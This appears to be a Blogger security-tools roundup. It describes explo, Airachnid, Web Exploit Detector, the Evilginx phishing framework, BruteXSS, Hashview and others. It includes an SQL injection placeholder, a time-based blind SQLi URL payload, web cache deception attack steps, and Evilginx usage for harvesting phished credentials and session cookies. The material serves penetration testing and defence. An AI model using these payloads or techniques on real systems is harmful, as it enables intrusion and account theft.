This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Showing posts with label Web. Show all posts
Showing posts with label Web. Show all posts

explo - Human And Machine Readable Web Vulnerability Testing Format

explo is a simple tool to describe web security issues in a human and machine readable format. By defining a request/condition workflow, explo is able to exploit security issues without the need of writing a script. This allows to share complex vulnerabilities in a simple readable and executable format.

Example for extracting a csrf token and using this in a form:
name: get_csrf
description: extract csrf token
module: http
parameter:
url: http://example.com/contact
method: GET
header:
user-agent: Mozilla/5.0
extract:
csrf: [CSS, "#csrf"]
---
name: exploit
description: exploits sql injection vulnerability with valid csrf token
module: http
parameter:
url: http://example.com/contact
method: POST
body:
csrf: "{{get_csrf.extracted.csrf}}"
username: "' SQL INJECTION"
find: You have an error in your SQL syntax


In this example definition file the security issue is tested by executing two steps which are run from top to bottom. The last step returns a success or failure, depending on the string 'You have an error in your SQL syntax' to be found.

Installation

Install via PyPI
pip install explo

Install via source
git clone https://github.com/dtag-dev-sec/explo
cd explo
python setup.py install

Usage
explo [--verbose|-v] testcase.yaml
explo [--verbose|-v] examples/*.yaml
There are a few example testcases in the examples/ folder.
$ explo examples/SQLI_simple_testphp.vulnweb.com.yaml
You can also include explo as a python lib:
from explo.core import from_content as explo_from_content
from explo.core import ExploException, ProxyException

def save_log(msg):
print(msg)

try:
result = explo_from_content(explo_yaml_file, save_log)
except ExploException as err:
print(err)

Modules
Modules can be added to improve functionality and classes of security issues.

http (basic)
The http modules allows to make a http request, extract content and search/verify content.
The following data is made available for following steps:
  • the http response body: stepname.response.content
  • the http response cookies: stepname.response.cookies
  • extracted content: response.extracted.variable_name
If a find_regex parameter is set, a regular expression match is executed on the response body. If this fails, this module returns a failure and thus stopping the executing of the current workflow (and all steps).
When extracting by regular expressions, use the match group extract to mark the value to extract (view below for an example).
For referencing cookies, reference the name of the previous step where cookies should be taken from (cookies: the_other_step.response.cookies).
Parameter examples:
parameter:
url: http://example.com
method: GET
allow_redirects: True
headers:
User-Agent: explo
Content-Type: abc
cookies: stepname.response.cookies
body:
key: value
find: search for string
find_regex: search for (reg|ular)expression
find_in_headers: searchstring in headers
extract:
variable1: [CSS, '#csrf']
variable2: [REGEX, '<input(.*?)value="(?P<extract>.*?)"']

http_header
The http header module allows to check if a response misses a specified set of headers (and values). All other parameters are identical to the http module.
The following data is made available for other modules:
  • the http response body: stepname.response.content
  • the http response cookies: stepname.response.cookies
Parameter examples:
parameter:
url: http://example.com
method: GET
allow_redirects: True
headers:
User-Agent: explo
Content-Type: abc
body:
key: value
headers_required:
X-XSS-Protection: 1
Server: . # all values are valid

sqli_blind
The sqli_blind module is able to identify time based blind sql injections.
The following data is made available for other modules:
  • the http response body: stepname.response.content
  • the http response cookies: stepname.response.cookies
Parameter examples:
parameter:
url: http://example.com/vulnerable.php?id=1' waitfor delay '00:00:5'--
method: GET
delay_seconds: 5
If the threshold of 5 seconds (delay_seconds) is exceeded, the check returns true (and thus resulting in a success).


Airachnid Burp Extension - A Burp Extension to test applications for vulnerability to the Web Cache Deception attack


A Burp extension to test applications for vulnerability to the Web Cache Deception attack.
Once the extension has been loaded, it can be accessed in the Target - Sitemap tab and right click on the resource that should be tested. A context sensitive menu item called "Airachnid Web Cache Test" will be shown and can be used to conduct testing. If the resource is vulnerable, an Issue is created detailing the vulnerability.
The context sensitive menu item is also available for requests in the Proxy - Http History tab.

Installation
  • Download the Airachnid.jar file.
  • In Burp Suite open Extender tab. In Extensions tab, click Add button.
  • Choose downloaded jar file -> Next.
  • Check installation for no error messages.

Vulnerability
In February 2017, security researcher Omer Gil unveiled a new attack vector dubbed “Web Cache Deception” (https://omergil.blogspot.co.il/2017/02/web-cache-deception-attack.html).
The Web Cache Deception attack could be devastating in consequences, but is very simple to execute:
  1. Attacker coerces victim to open a link on the valid application server containing the payload.
  2. Attacker opens newly cached page on the server using the same link, to see the exact same page as the victim.
** Of course, this attack only makes sense when the vulnerable resource available to the attacker returns sensitive data.
The attack depends on a very specific set of circumstances to make the application vulnerable: 1. The application only reads the first part of the URL to determine the resource to return.
If the victim requests:
https://www.example.com/my_profile
The application returns the victim profile page. The application uses only the first part of the URL to determine that the profile page should be returned. If the application receives a request for
https://www.example.com/my_profile_test
It would still return the profile page of the victim, disregarding the added text. The same applies for other URL like
https://www.example.com/my_profile/test
2. The application stack caches resources according to their file extensions, rather than by cache header values. If the application stack has been configured to cache image files. It will cache all resources with .jpg .png or .gif extensions. That means that e.g. the image at
https://www.example.com/images/dog.jpg
Would be retrieved from the application server the first time the image is requested. All subsequent requests for the image are retrieved from cache, responding with the same resource that was initially cached (for as long as the cache timeout is set).

Attack
These preconditions can be exploited for the Web Cache Deception attack in the following manner:

Step 1: An attacker entices the victim to open a maliciously crafted link:
  https://www.example.com/my_profile/test.jpg
  • The application ignores the 'test.jpg' part of the URL, the victim profile page is loaded.
  • The caching mechanism identifies the resource as an image, caching it.  

Step 2: The attacker sends a GET request for the cached page:
https://www.example.com/my_profile/test.jpg
  • The cached resource, which is in fact the victim profile page is returned to the attacker (and to anyone else requesting it).

Web Exploit Detector - Tool To Detect Possible Infections, Malicious Code And Suspicious Files In Web Hosting Environments


The Web Exploit Detector is a Node.js application (and NPM module) used to detect possible infections, malicious code and suspicious files in web hosting environments. This application is intended to be run on web servers hosting one or more websites. Running the application will generate a list of files that are potentially infected together with a description of the infection and references to online resources relating to it.

As of version 1.1.0 the application also includes utilities to generate and compare snapshots of a directory structure, allowing users to see if any files have been modified, added or removed.
The application is hosted here on GitHub so that others can benefit from it, as well as allowing others to contribute their own detection rules.

Installation

Regular users
The simplest way to install Web Exploit Detector is as a global NPM module: -
npm install -g web_exploit_detector
If you are running Linux or another Unix-based OS you might need to run this command as root (e.g. sudo npm install -g web_exploit_detector).

Updating
The module should be updated regularly to make sure that all of the latest detection rules are present. Running the above command will always download the latest stable (tested) version. To update a version that has already been installed, simply run the following: -
npm update -g web_exploit_detector
Again, you may have to use the sudo command as above.

Technical users
You can also clone the Git repository and run the script directly like so: -
  1. git clone https://github.com/polaris64/web_exploit_detector
  2. cd web_exploit_detector
  3. npm install

Running

From NPM module
If you have installed Web Exploit Detector as an NPM module (see above) then running the scanner is as simple as running the following command, passing in the path to your webroot (location of your website files): -
wed-scanner --webroot=/var/www/html
Other command-line options are available, simply run wed-scanner --help to see a help message describing them.
Running the script in this way will produce human-readable output to the console. This is very useful when running the script with cron for example as the output can be sent as an e-mail whenever the script runs.
The script also supports the writing of results to a more computer-friendly JSON format for later processing. To enable this output, see the --output command line argument.

From cloned Git repository
Simply call the script via node and pass the path to your webroot as follows: -
node index.js --webroot=/var/www/html

Recursive directory snapshots
The Web Exploit Detector also comes with two utilities to help to identify files that might have changed unexpectedly. A successful attack on a site usually involves deleting files, adding new files or changing existing files in some way.

Snapshots
A snapshot (as used by these utilities) is a JSON file which lists all files as well as a description of their contents at the point in which the snapshot was created. If a snapshot was generated on Monday, for example, and then the site was attacked on Tuesday, then running a comparison between this snapshot and the current site files afterwards will show that one or more files were added, deleted or changed. The goal of these utilities therefore is to allow these snapshots to be created and for the comparisons to be performed when required.
The snapshot stores each file path together with a SHA-256 hash of the file contents. A hash, or digest, is a small summary of a message, which in this case is the file's contents. If the file contents change, even in a very small way, the hash will become completely different. This provides a good way of detecting any changes to file contents.

Usage
The following two utilities are also installed as part of Web Exploit Detector: -
  • wed-generate-snapshot: this utility allows a snapshot to be generated for all files (recursively) in a directory specified by "--webroot". The snapshot will be saved to a file specified in the "--output" option.
  • wed-compare-snapshot: once a snapshot has been generated it can be compared against the current contents of the same directory. The snapshot to check is specified using the "--snapshot" option. The base directory to check against is stored within the snapshot, but if the base directory has changed since the snapshot was generated then the --webroot option can be used.

Workflow
Snapshots can be generated as frequently as required, but as a general rule of thumb they should be generated whenever a site is in a clean (non-infected) state and whenever a legitimate change has been made. For CMS-based sites like WordPress, snapshots should be created regularly as new uploads will cause the new state to change from the stored snapshot. For sites whose files should never change, a single snapshot can be generated and then used indefinitely ensure nothing actually does change.

Usage as a module
The src/web-exploit-detector.js script is an ES6 module that exports the set of rules as rules as well as a number of functions: -
  • executeTests(settings): runs the exploit checker based on the passed settings object. For usage, please consult the index.js script.
  • formatResult(result): takes a single test result from the array returned from executeTests() and generates a string of results ready for output for that test.
  • getFileList(path): returns an array of files from the base path using readDirRecursive().
  • processRulesOnFile(file, rules): processes all rules from the array rules on a single file (string path).
  • readDirRecursive(path): recursive function which returns a Promise which will be resolved with an array of all files in path and sub-directories.
The src/cli.js script is a simple command-line interface (CLI) to this module as used by the wed-scanner script, so reading this script shows one way in which this module can be used.
The project uses Babel to compile the ES6 modules in "src" to plain JavaScript modules in "lib". If you are running an older version of Node.js then modules can be require()'d from the "lib" directory instead.

Building
The package contains Babel as a dev-dependency and the "build" and "watch:build" scripts. When running the "build" script (npm run build), the ES6 modules in "./src" will be compiled and saved to "./lib", where they are included by the CLI scripts.
The "./lib" directory is included in the repository so that any user can clone the repository and run the application directly without having to install dev-dependencies and build the application.

Excluding results per rule
Sometimes rules, especially those tagged with suspicion, will identify a clean file as a potential exploit. Because of this, a system to allow files to be excluded from being checked for a rule is also included.
The wed-results-to-exceptions script takes an output file from the main detector script (see the --output option) and gives you the choice to exclude each file in turn for each specific rule. All excluded files are stored in a file called wed-exceptions.json (in the user's home directory) which is read by the main script before running the scan. If a file is listed in this file then all attached rules (by ID) will be skipped when checking this file.
For usage instructions, simply run wed-results-to-exceptions. You will need to have a valid output JSON from a previous run of the main detector first using the --output option.
For users working directly with the Git repository, run node results_to_exceptions.js in the project root directory.

Rule engine
The application operates using a collection of "rules" which are loaded when the application is run. Each rule consists of an ID, name, description, list of URLs, tags, deprecation flag and most importantly a set of tests.
Each individual test must be one of the following: -
  • A regular expression: the simplest type of test, any value matching the regex will pass the test.
  • A Boolean callback: the callback function must return a Boolean value indicating if the value passes the test. The callback is free to perform any synchronous operations.
  • A Promise callback: the callback function must return a Promise which is resolved with a Boolean value indicating if the value passes the test. This type of callback is free to perform any asynchronous operations.
The following test types are supported: -
  • "path": used to check the file path. This test must exist and should evaluate to true if the file path is considered to match the rule.
  • "content": used to check the contents of a file. This test is optional and file contents will only be read and sent to rules that implement this test type. When this test is a function, the content (string) will be passed as the first argument and the file path will be passed as the second argument, allowing the test to perform additional file operations.

Expanding on the rules
As web-based exploits are constantly evolving and new exploits are being created, the set of rules need to be updated too. As I host a number of websites I am constantly observing new kinds of exploits, so I will be adding to the set of rules whenever I can. I run this tool on my own servers, so of course I want it to be as functional as possible!
This brings me onto the reasons why I have made this application available as an open-source project: firstly so that you and others can benefit from it and secondly so that we can all collaborate to contribute detection rules so that the application is always up to date.

Contributing rules
If you have discovered an exploit that is not detected by this tool then please either contact me to let me know or even better, write your own rule and add it to the third-party rule-set (rules/third-party/index.js), then send me a pull request.
Don't worry if you don't know how to write your own rules; the most important thing is that the rule gets added, so feel free to send me as much information as you can about the exploit and I will try to create my own rule for it.
Rules are categorised, but the simplest way to add your own rule is to add it to the third-party rule-set mentioned above. Rule IDs are written in the following format: "author:type:sub-type(s):rule-id". For example, one of my own rules is "P64:php:cms:wordpress:wso_webshell". "P64" is me (the author), "php:cms:wordpress" is the grouping (a PHP-specific rule, for the Content Management System (CMS) called WordPress) and "wso_webshell" is the specific rule ID. When writing your own rules, try to follow this format, and replace "P64" with your own GitHub username or other unique ID.

Unit tests and linting
The project contains a set of Jasmine tests which can be run using npm test. It also contains an ESLint configuration, and ESLint can be run using npm run lint.
When developing, tests can also be run whenever a source file changes by running npm run watch:test. To run tests and ESLint, the npm run watch:all script can be used.
Please note that unless you already have Jasmine and/or nodemon installed, you should run npm install in non-production mode to ensure that the dev-dependencies are installed.


Evilginx - MITM Attack Framework [Advanced Phishing With Two-factor Authentication Bypass]


Evilginx is a man-in-the-middle attack framework used for phishing credentials and session cookies of any web service. It's core runs on Nginx HTTP server, which utilizes proxy_pass and sub_filter to proxy and modify HTTP content, while intercepting traffic between client and server.

You can learn how it works and how to install everything yourself on:

Usage
usage: evilginx_parser.py [-h] -i INPUT -o OUTDIR -c CREDS [-x]

optional arguments:
-h, --help show this help message and exit
-i INPUT, --input INPUT
Input log file to parse.
-o OUTDIR, --outdir OUTDIR
Directory where output files will be saved.
-c CREDS, --creds CREDS
Credentials configuration file.
-x, --truncate Truncate log file after parsing.
Example:
python evilginx_parser.py -i /var/log/evilginx-google.log -o ./logs -c google.creds

Video

morty - Privacy aware web content sanitizer proxy as a service


Web content sanitizer proxy as a service.

Morty rewrites web pages to exclude malicious HTML tags and attributes. It also replaces external resource references to prevent third party information leaks.
The main goal of morty is to provide a result proxy for searx , but it can be used as a standalone sanitizer service too.

Features:
  • HTML sanitization
  • Rewrites HTML/CSS external references to locals
  • JavaScript blocking
  • No Cookies forwarded
  • No Referrers
  • No Caching/Etag
  • Supports GET/POST forms and IFrames
  • Optional HMAC URL verifier key to prevent service abuse

Installation and setup
$ go get github.com/asciimoo/morty
$ "$GOPATH/bin/morty" --help

Test
$ cd "$GOPATH/src/github.com/asciimoo/morty"
$ go test

Benchmark
$ cd "$GOPATH/src/github.com/asciimoo/morty"
$ go test -benchmem -bench .


BruteXSS - Tool to find XSS vulnerabilities in web application


BruteXSS is a tool written in python simply to find XSS vulnerabilities in web application.
This tool was originally developed by Shawar Khan in CLI. I just redesigned it and made it GUI for more convienience.

This tool is developed in Python, so obviously cross platform, you just need Python installed in your machine.

Steps

  1. Just download your tool & run brutexss.py (Everything this tool needed is provided to it)
Screenshots





Hashview - A Web Front-End For Password Cracking And Analytics


Hashview is a tool for security professionals to help organize and automate the repetitious tasks related to password cracking. Hashview is a web application that manages hashcat ( https://hashcat.net ) commands. Hashview strives to bring constiency in your hashcat tasks while delivering analytics with pretty pictures ready for ctrl+c, ctrl+v into your reports.

Requirements
  1. Hashcat installed and working ( https://hashcat.net/hashcat/ )
  2. Hashcat installed and working (just double checking)
  3. A working RVM environment ( https://rvm.io/rvm/install )

Installation
Involves installing mysql, resque, and a ruby app

Install mysql & Redis

sudo apt-get update
sudo apt-get install mysql-server libmysqlclient-dev redis-server openssl rake
[optional, but recommended]
mysql_secure_installation

Optimize the database

vim /etc/mysql/my.cnf
Add the following line under the [mysqld] section:
innodb_flush_log_at_trx_commit  = 0
restart mysqld
service mysql restart

Install RVM (recommended)

https://rvm.io/rvm/install

Setup Hashview

Download Hashview

git clone https://github.com/hashview/hashview

Install gems (from hashview directory)

Install ruby 2.2.2 via RVM (if using RVM (recommended))
rvm install ruby-2.2.2
Install dependencies
gem install bundler
bundle install

Setup database connectivity

cp config/database.yml.example config/database.yml
vim config/database.yml

Create database

RACK_ENV=production rake db:setup

DerbyCon 2016 Talk on Hashview




Developing and Contributing
Please see the Contribution Guide for how to develop and contribute.
If you have any problems, please consult Issues page first. If you don't see a related issue, feel free to add one and we'll help.

Authors
Contact us on Twitter @caseycammilleri
@jarsnah12
Checkout www.shellntel.com


[ImageCacheViewer] View images in the cache of your Web browser


ImageCacheViewer is a simple tool that scans the cache of your Web browser (Internet Explorer, Firefox, or Chrome), and lists the images displayed in the Web sites that you recently visited. 

For every cached image file, the following information is displayed: URL of the image, Web browser that was used to visit the page, image type, date/time of the image, browsing time, and file size. 

When selecting a cache item in the upper pane of ImageCacheViewer, the image is displayed in the lower pane, and you can copy the image to the clipboard by pressing Ctrl+M.

System Requirements And Limitations
  • This utility works in any version of Windows, starting from Windows XP and up to Windows 8. Both 32-bit and 64-bit systems are supported.
  • The following Web browsers are supported: Internet Explorer, Mozilla Firefox, SeaMonkey, and Google Chrome.
  • ImageCacheViewer won't work if you configure your Web browser to clear the cache after closing it.
  • It's recommended to close all windows of your Web browser before using ImageCacheViewer, to ensure that all cache files are saved to the disk.

Start Using ImageCacheViewer

ImageCacheViewer doesn't require any installation process or additional DLL files. In order to start using it, simply run the executable file - ImageCacheViewer.exe
After running ImageCacheViewer, it begins to scan the cache of your Web browser, and displays all cached images from Web sites you visited in the last day. If you want to get images from other days, you can remove or change the last 1-day filter from the 'Advanced Options' window (F9).
After the scanning process is finished, you can also watch the image in the lower pane of ImageCacheViewer, by selecting the desired item in the upper pane.
If from some reason ImageCacheViewer fails to detect the cache of your Web browser properly, you can go to 'Advanced Options' window (F9), and choose the desired cache folders to scan for each Web browser.